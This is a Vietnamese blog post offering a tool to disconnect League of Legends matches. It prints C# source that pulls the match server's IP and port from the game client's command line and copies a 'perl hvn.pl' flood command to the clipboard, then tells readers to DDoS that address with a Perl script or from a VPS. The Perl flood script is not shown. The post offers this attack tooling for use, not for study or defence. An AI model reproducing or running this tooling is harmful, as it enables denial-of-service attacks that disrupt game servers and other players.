Đây là tool hạck disconnect Lol bằng cách dò IP của đối phương rồi DDOS, link tool nằm ở cuối bài viết
Còn đây là code nếu bạn muốn tự tạo file riêng cho mình
Đầu tiên cần Có Visual Studio để đóng gói ứng dụng C#
Code tool Tìm IP của trận đấu như sau:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
|
using System;
using System.Collections.Generic;
using System.Management;
using System.Text.RegularExpressions;
using System.Windows.Forms;
namespace League_IP
{
internal class Lolip
{
[STAThread]
private static void Main(string[] args)
{
List<string> list = new Lolip().wmi_process();
if (list.Count < 1)
return;
Console.WriteLine("LOLIP - Modified by HackerPro536 - HVNGroups.Net");
Console.WriteLine("\nIP: " + list[0]);
Console.WriteLine("Port: " + list[1]);
Clipboard.SetText("perl hvn.pl " + list[0] + " " + list[1] + " 1024 600");
Console.ReadLine();
}
private List<string> wmi_process()
{
string input = "";
List<string> list1 = new List<string>();
try
{
foreach (ManagementBaseObject managementBaseObject in new ManagementObjectSearcher("root\\CIMV2", "SELECT * FROM Win32_Process WHERE Caption = 'League of Legends.exe'").Get())
input = managementBaseObject["CommandLine"].ToString();
}
catch (ManagementException ex)
{
Console.WriteLine("An error occurred while querying for WMI data: " + ex.Message);
}
if (input.Length <= 1)
return list1;
string pattern = "\"";
IList<int> list2 = (IList<int>) new List<int>();
foreach (Match match in Regex.Matches(input, pattern))
list2.Add(match.Index);
int num = list2[list2.Count - 2];
string str1 = input.Substring(num + 1);
string str2 = str1.Substring(0, str1.IndexOf(' ') + 1);
string str3 = str1.Substring(str2.Length, 4);
string str4 = str2.Trim();
string str5 = str3.Trim();
list1.Add(str4);
list1.Add(str5);
return list1;
}
}
}
|
Sau khi đóng gói sẽ được ứng dụng sau:
Sau khi có chương trình Tìm IP trận đấu rồi thì dùng perl ddos hoặc ddos trên VPS , koding gì đấy tùy bạn:
Code như sau:
Nguồn : Bấm Vào Đây
Chào mừng bạn đã đến với Blog của tôi. Website chia sẻ Thủ Thuật - Phần Mềm - Ảnh Đẹp - PSD tổng hợp, ... được cập nhật liên tục. Mong được mọi người quan tâm.
No comments: